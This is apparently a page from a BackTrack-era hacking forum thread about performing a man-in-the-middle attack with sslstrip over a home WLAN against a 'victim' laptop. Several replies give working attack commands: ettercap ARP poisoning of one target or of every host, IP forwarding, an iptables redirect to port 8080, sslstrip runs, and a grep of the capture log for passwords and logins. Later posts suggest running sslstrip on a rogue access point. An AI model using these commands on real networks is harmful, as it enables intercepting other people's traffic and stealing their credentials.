Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: howto sslstrip in wlan?

  1. #1
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Question Howto MITM in a WLAN?

    hi there,

    following scenario:

    my homenetwork ->
    - wlan router (speedport 701)
    - eee 1000h (victim running WinXP, connected via wlan)
    - eee 1000h (attacker running BT4 or ubuntu 9.04, connected via wlan)

    If I connect the eee's with a wire to the router I can arpspoof the victim and the strip the ssl connection.
    But how do I do that in a wlan network.
    If i arpspoof the wlan victim it's cut of the network...
    II think it's because the victim thinks that i am the accesspoint and not only the router.

    So how can i strip the ssl in a wlan connection?

    Edit:
    If I connect the the vixtim and the attacker via cable it works...
    So it's not my dumbness!


    Edit2:

    Ok i thought about my thread and the problem is not how to sslstrip.
    The problem is how to do a MITM in a wlan!

  2. #2
    Junior Member waxlrose's Avatar
    Join Date
    Feb 2009
    Posts
    27

    Default

    not sure if you can do it on wlan protos

  3. #3

    Cool

    Quote Originally Posted by hardez View Post

    Ok i thought about my thread and the problem is not how to sslstrip.
    The problem is how to do a MITM in a wlan!
    Check this out....
    Rogue Accesspoint + MitM Sniffing tutorial
    Code:
    http://forums.remote-exploit.org/showthread.php?t=19048

  4. #4
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Guessing you are having problems with arpspoof. It is kind of picky on what cards you have. Use ettercap.

    ettercap -T -q -i wlan0 -M arp /victum ip ie 192.169.0.101/ //

    -T is for just text -q is for quit -i is your interphase -M is MITM arp is to arp em! If you don't know what the target ip is then nail em all.

    ettercap -T -q -i wlan0 -M arp // //

    Don't do this on a network with a zillion people on it.

    Not sure what card you have but you said wlan so I guess you have a Alfa or something like that.
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  5. #5

    Default

    To my knowledge, arpspoof is broken with reference to the network interface option. A patched version can be found HERE. I know this version of arpspoof will work fine over wireless for MITM.

  6. #6
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    If you don't feel like down loading the patched version of arpspoof that cypersnpr talks about this is an other way of doing what you want. The patched arpspoof works well.

    # echo "1" > /proc/sys/net/ipv4/ip_forward

    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    # python ./sslstrip.py -p -f -l 8080 (-p only SSL POST, -f favicon)

    # ettercap -T -q -i wlan0 -M arp /target IP/ // ( /666.666.666.666/ // )

    # cat sslstrip.log | grep (ie pw, pass, login etc)
    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  7. #7
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default

    Ok tryed it with ettercap, worked fine, BUT...

    As I started sslstrip all connections to http sites were blocked!
    https sites works.

    i tryed it with

    Code:
     sslstrip -f -k -l 8080
    and with
    Code:
     sslstrip -p -f -l 8080
    but nothing works.

    If I stop sslstrip the connection works.

    Ideas?

    EDIT:
    This is done under ubuntu 9.04 didn't tryed with BT4
    But in my opinion it should work there too...


    EDIT2:
    Just tryed it in BT4 and it works...
    But WHY?!
    Why does it works in BT and not in Ubuntu 9.04?

  8. #8
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    even with the patched version of arpspoof i still had probs.

    ettercap is much better to use, and worked like a charm.

    hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.

    think duel FON
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  9. #9

    Default

    Quote Originally Posted by vvpalin View Post
    even with the patched version of arpspoof i still had probs.

    ettercap is much better to use, and worked like a charm.

    hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.

    think duel FON
    I've had the same type issue with metasploit...it worked fine in BT, but not so well on Sidux. Really makes you appreciate the dev's.
    "You can get more with a kind word and a gun than you can with a kind word alone."
    - Al Capone

  10. #10
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231

    Default

    Quote Originally Posted by onryo View Post
    Guessing you are having problems with arpspoof. It is kind of picky on what cards you have. Use ettercap.

    ettercap -T -q -i wlan0 -M arp /victum ip ie 192.169.0.101/ //
    hallelujah!

    I prepared everything in my last war games and then arpspoof (the easiest part) didn't work. It was awful
    Auswaertsspiel

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •